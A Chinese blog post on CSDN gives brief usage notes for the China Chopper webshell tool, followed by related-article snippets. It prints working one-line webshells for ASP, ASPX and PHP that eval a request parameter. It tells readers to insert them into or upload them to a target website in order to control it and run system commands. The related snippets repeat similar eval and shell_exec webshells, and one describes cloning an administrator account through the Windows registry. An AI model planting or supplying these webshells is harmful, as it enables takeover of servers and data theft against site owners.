2018-11 中国菜刀小试记录(windows环境)

最新推荐文章于 2024-03-17 09:46:12 发布
最新推荐文章于 2024-03-17 09:46:12 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: web安全渗透 文章标签: 2018 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42254735/article/details/83752260
版权

一. 简介:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。


传说中的官方网站:http://maicaidao.co/   。下载的时候发现是2014年的版本。。。


测试完官方的中国菜刀后,从Cracer的Cracer安全工具包v7版中拿了一个相对较新的,但是发现百度上找到的菜刀都有后门,并且中国菜刀的这些一句话木马很容易就被杀毒软件查杀了,所以推荐两款更好的kali下的工具:webacoo、Weevely 。

 

二. 记录:


asp的一句话是: <%eval request ("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是: <?php @eval($_POST['pass']);?>


我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

使用起来非常简单,如下图:

昨天今天下雨天233
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1273
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
CSGO-CFG:菜刀的反恐精英
04-17
鼠标:1khz轮询速率,400dpi,6/11 Windows sens。 和1.5的游戏感。 ( ) 视频:1280x960,190hz(超频),所有设置为最低,启用Uber着色器( ,GTX 1080Ti) 特征 根据ping修改费率 跳投绑定 可切换的滚动B跳 ...
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 1384
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2137
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
上传渗透----中国菜刀和kali的使用安全攻防)
baidu_38803985的博客
04-09 4895
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜刀和kali这两个工具 实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕...
行业文档-设计装置-一种节能菜刀.zip
08-29
在本压缩包“行业文档-设计装置-一种节能菜刀.zip”中,主要包含了一份名为“一种节能菜刀.pdf”的文件。这份文档很可能是关于厨房用具设计领域的一个创新项目,特别是聚焦在节能型菜刀的设计上。接下来,我们将深入...
电子政务-家用电动菜刀.zip
09-17
1. **政务信息公开**:政府通过电子政务平台,可以及时发布有关家用电器行业的政策法规、标准规定、市场动态等信息,帮助企业和消费者了解行业发展趋势和政策环境。 2. **在线服务**:政府可提供在线审批、注册等...
caidao-20160622-www.maicaidao.com.rar
最新发布
05-12
菜刀,他是一款专业的网站管理工具 ------------------------------------------- 一、网站管理模块 ---------------- 放在网站上的脚本程序分两种:  1)“一句话(Eval)”: PHP, ASP, ASP.NET 的网站都可以...
行业文档-设计装置-一种具有打孔器的菜刀.zip
08-30
在本主题中,我们主要探讨的是“一种具有打孔器的菜刀”这一创新设计,它结合了传统厨刀的功能与现代技术,旨在提升厨房工作效率和烹饪体验。这个设计不仅适用于家庭厨房,还可能对餐饮业产生深远影响。以下是关于这...
WEB安全渗透课程ppt
01-04
WEB安全渗透课程ppt,cisp-pte教材,包含16个章节,涵盖日常常用漏洞解析
cracer最新教程
10-08
cracer的教程,3000的价格,现在5积分送出!教你渗透从入门到精通,每节1.5小时的视频,高质量高效率。学习实战两不误
行业资料-交通装置-一种不粘刀菜刀.zip
08-20
行业资料-交通装置-一种不粘刀菜刀.zip
Python-CaidaoAESVersion用AES算法透明加密菜刀的http数据流
08-10
一个Burp插件,实现用AES算法透明加密原版菜刀Caidao.exe与服务器端交互的http数据流
小小菜刀编辑器 v2.0-源码.zip
02-26
《小小菜刀编辑器 v2.0 源码解析》 在编程世界里,源码是理解软件工作原理的钥匙。"小小菜刀编辑器 v2.0" 是一个面向初学者和专业人士的文本编辑工具,其源码的公开为开发者提供了宝贵的教育资源。源码学习是提升...
渗透测试常用工具汇总_渗透测试实战
ZL_1618的博客
09-25 1860
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。此外,它还具有功能齐全的仪表板、广泛的扫描功能和多格式报告功能。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
cracer web安全-Windows基础
leriger的博客
09-16 433
克隆用户:在HKEY_LOCAL_MACHINE--SAM(打开读取权限)--Domains--Account--Users(发现guest是000001F5,Administrator是000001F4)--1F4的F值复制到1F5的F值--恢复权限。在这个根键中保存了本地计算机中存放的当前登录的用户信息,包括用户登录用户名和暂存的密码。在这个根键中保存着定义当前用户桌面配置(如显示器)的数据,该用户使用过的文档列表(MRU),应用程序配置和其他有关当前用户的Windows98中文版的安装的信息。
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
热门推荐
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
Cracer渗透视频课程学习笔记——信息搜集
尘埃飞舞
08-06 7638
信息搜集 渗透一个网站收集这部分信息基本就够用了。 常用渗透测试系统:Back track5 ,parrot(新出来的),Kali(最好用的使用的人最多的) 一、DNS收集 域名--IP收集: 相关域名对应ip,相关工具:nslookup、一些工具网站 子域名收集: 工具:layer、sub...
5次Shift漏洞:Windows系统重改密码与启动计算机
他以一个网络安全新手的身份,从基础的绕过安全软件的方法(如绕过安全狗的安全菜刀)开始,然后深入到Windows系统漏洞的具体应用。在这一篇章中,作者介绍了如何利用这个漏洞来演示如何在不受限制的环境下操作CMD...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值